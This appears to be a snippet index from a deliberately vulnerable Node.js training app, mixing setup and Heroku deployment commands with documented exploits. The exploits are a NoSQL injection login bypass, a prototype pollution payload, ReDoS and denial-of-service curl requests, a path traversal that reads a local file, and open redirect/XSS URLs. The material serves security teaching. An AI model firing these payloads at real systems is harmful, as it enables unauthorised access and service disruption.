### Install and Run Snyk Wizard for Vulnerability Fixing Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md These commands demonstrate the process of installing the Snyk CLI globally and then running the 'snyk wizard' command. The wizard guides users through fixing detected vulnerabilities in their projects, with default answers often resolving all issues in this specific application. ```bash npm install -g snyk snyk wizard ``` -------------------------------- ### Running Goof Locally Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md Commands to clone the Goof repository, install dependencies, and start the Node.js application locally. Assumes a local MongoDB instance is running. ```bash mongod & git clone https://github.com/snyk-labs/nodejs-goof npm install npm start ``` -------------------------------- ### Install Heroku CLI on macOS Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Installs the Heroku Command Line Interface (CLI) on macOS using Homebrew. This tool is essential for interacting with the Heroku platform. ```shell brew install heroku/brew/heroku ``` -------------------------------- ### Run MySQL Database Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md Starts a MySQL 5 Docker container for demonstration purposes, exposing port 3306 and setting the root password to 'root'. This allows for easy database setup for testing TypeORM vulnerabilities. ```sh docker run -p3306:3306 --rm --name mysqld -e MYSQL_ROOT_PASSWORD=root mysql:5 ``` -------------------------------- ### Running Goof with Docker Compose Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md Commands to build and start the Goof application using Docker Compose, and to stop and remove the containers. ```bash docker-compose up --build docker-compose down ``` -------------------------------- ### Open Redirect and XSS via redirectPage Parameter Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This example highlights an open redirect vulnerability and a potential Cross-Site Scripting (XSS) vulnerability in the '/admin' view. The 'redirectPage' query parameter is rendered unescaped using Handlebars' '<%- %>', allowing for both redirection to arbitrary external sites and script injection. ```http http://localhost:3001/login?redirectPage="> ``` ```http http://localhost:3001/admin?redirectPage=https://google.com ``` -------------------------------- ### Get User Profile (Normal Request) Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md Sends a GET request to the /users endpoint to retrieve the profile of the currently logged-in user. In the normal flow, this hard-coded user (ID: 1) is returned. ```sh curl --request GET \ --url http://localhost:3001/users \ --header 'content-type: application/json' ``` -------------------------------- ### Create a Heroku App Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Creates a new application instance on the Heroku platform. This command provisions a new Heroku app with a unique name and Git URL. ```shell heroku create ``` -------------------------------- ### Authenticate to Heroku Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Logs the user into the Heroku CLI. This command initiates an authentication flow, typically opening a web browser for confirmation. ```shell heroku login ``` -------------------------------- ### Deploy Goof App to Heroku Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Deploys the current application code from the local Git repository to the Heroku platform. It pushes the 'master' branch to the 'heroku' remote. ```shell git push heroku master ``` -------------------------------- ### View Heroku App Logs Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Streams the logs from the Heroku application in real-time. The '--tail' flag ensures that new log entries are continuously displayed. ```shell heroku logs --tail ``` -------------------------------- ### Restart Heroku App Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Manually restarts the dynos (processes) for the Heroku application. Setting 'web=1' ensures that at least one web process is running and restarted. ```shell heroku ps:scale web=1 ``` -------------------------------- ### Running MongoDB with Docker Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md Command to run a MongoDB version 3 instance using Docker, which is required by some older libraries used in the Goof application. ```bash docker run --rm -p 27017:27017 mongo:3 ``` -------------------------------- ### Add MongoDB Addon to Heroku App Source: https://github.com/snyk-labs/nodejs-goof/blob/main/deploy-heroku.md Adds a MongoDB addon (specifically the 'sandbox' plan) to the current Heroku application. This provides a managed MongoDB database instance. ```shell heroku addons:create mongolab:sandbox ``` -------------------------------- ### Run Node.js App with Runtime Monitoring Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This command illustrates how to run a Node.js application with Snyk's runtime monitoring enabled. It requires setting the SNYK_PROJECT_ID environment variable to associate the monitored application with a specific Snyk project for reporting detected vulnerabilities. ```bash SNYK_PROJECT_ID= npm start ``` -------------------------------- ### Scan Docker Image for Vulnerabilities Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This command demonstrates how to use the Snyk CLI to scan a Docker image for system libraries with known vulnerabilities. It specifies the Docker image and the Dockerfile for context. ```bash snyk test --docker node:6-stretch --file=Dockerfile ``` -------------------------------- ### Monitor Docker Image with Snyk Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This command shows how to use the Snyk CLI to monitor a Docker image. Monitoring allows Snyk to provide alerts for new vulnerabilities discovered in the image over time. ```bash snyk monitor --docker node:6-stretch ``` -------------------------------- ### Cleanup Goof Database Entries Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md Command to execute a script that bulk deletes TODO items from the application's database. ```bash npm run cleanup ``` -------------------------------- ### Create Dummy Database Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md Creates a database named 'acme' within the running MySQL instance. This database is used by the TypeORM application for storing user data and demonstrating the exploit. ```sql create database acme; ``` -------------------------------- ### Create New User (Normal Request) Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md Sends a POST request to the /users endpoint to create a new user with a name, address, and role. This demonstrates a standard, non-malicious interaction with the application. ```sh curl --request POST \ --url http://localhost:3001/users \ --header 'content-type: application/json' \ --data '{\ "name": "a",\ "address": "vvv",\ "role": "user"\ }' ``` -------------------------------- ### Access MySQL Client Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md Provides a command to access the MySQL client interactively within the running 'mysqld' container. This allows users to inspect database records and verify the effects of the exploit. ```sh docker exec -it mysqld mysql -uroot -p ``` -------------------------------- ### Denial of Service via Sanitizer (validator.rtrim) Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This command demonstrates a denial of service vulnerability using the 'validator.rtrim()' sanitizer. By sending a long string to the 'firstname' field, an attacker can exploit a weakness in the sanitizer to cause a denial of service on the '/account_details' endpoint. ```curl curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"someone@example.com\", \"country\": \"nop\", \"phone\": \"0501234123\", \"lastname\": \"nop\", \"firstname\": \"`node -e 'console.log(\" \".repeat(100000) + \"!\")'`\"}" 'http://localhost:3001/account_details' ``` -------------------------------- ### Initialize Node.js Session with Hardcoded Secret Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This snippet shows the initialization of a cookie-based session in a Node.js application. It highlights the 'secret' parameter used to sign the session, which is hardcoded directly in the code, posing a security risk. Snyk Code can detect this hardcoded secret. ```javascript app.use(session({ secret: 'keyboard cat', name: 'connect.sid', cookie: { secure: true } })) ``` -------------------------------- ### Denial of Service via Regex (Email Validation) Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This command illustrates a Regular Expression Denial of Service (ReDoS) vulnerability in the 'validator' library used for email validation. By providing a crafted, excessively long string to the 'email' field with the '{allow_display_name: true}' option, an attacker can trigger a denial of service on the '/account_details' route. ```curl curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"`seq -s \"\" -f \"<\" 100000`\"}" 'http://localhost:3001/account_details' ``` -------------------------------- ### Code Injection via Handlebars (Path Traversal) Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This snippet demonstrates a code injection vulnerability in a Node.js application using Handlebars for server-side rendering. By manipulating the 'layout' parameter in a POST request to '/account_details', an attacker can achieve Local File Inclusion (Path Traversal) by including sensitive files like 'package.json'. ```curl curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"username": "admin@snyk.io", "password": "SuperSecretPassword"}' 'http://localhost:3001/login' ``` ```curl curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"email": "admin@snyk.io", "firstname": "admin", "lastname": "admin", "country": "IL", "phone": "+972551234123", "layout": "./../package.json"}' 'http://localhost:3001/account_details' ``` -------------------------------- ### Fix Node.js Session Secret by Moving to Config File Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This code snippet demonstrates a first attempt to fix a hardcoded session secret by moving it to a separate configuration file. While it removes the secret from the main application file, Snyk Code will still flag it as it resides within the project's codebase. ```javascript module.exports = { cookieSecret: `keyboard cat` } ``` -------------------------------- ### Exploit: Poison Prototype via User Creation Source: https://github.com/snyk-labs/nodejs-goof/blob/main/exploits/prototype-pollution-typeorm.md Submits a POST request to /users that includes a nested '__proto__' object. This payload exploits an insecure merge in TypeORM, injecting a 'where' property into Object.prototype, which can alter query behavior. ```sh curl --request POST \ --url http://localhost:3001/users \ --header 'content-type: application/json' \ --data '{\ "name": "a",\ "address": {\ "__proto__": {\ "where": {\ "id": "2",\ "where": null\ }\ }\ }\ }' ``` -------------------------------- ### NoSQL Injection via Password Field Source: https://github.com/snyk-labs/nodejs-goof/blob/main/README.md This snippet shows a NoSQL injection vulnerability in the login functionality. By sending a crafted JSON object as the password, specifically `{"username": "admin@snyk.io", "password": {"$gt": ""}}`, an attacker can bypass authentication by exploiting MongoDB's '$gt' operator to match any record. ```httpie echo '{"username": "admin@snyk.io", "password": {"$gt": ""}}' | http --json $GOOF_HOST/login -v ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.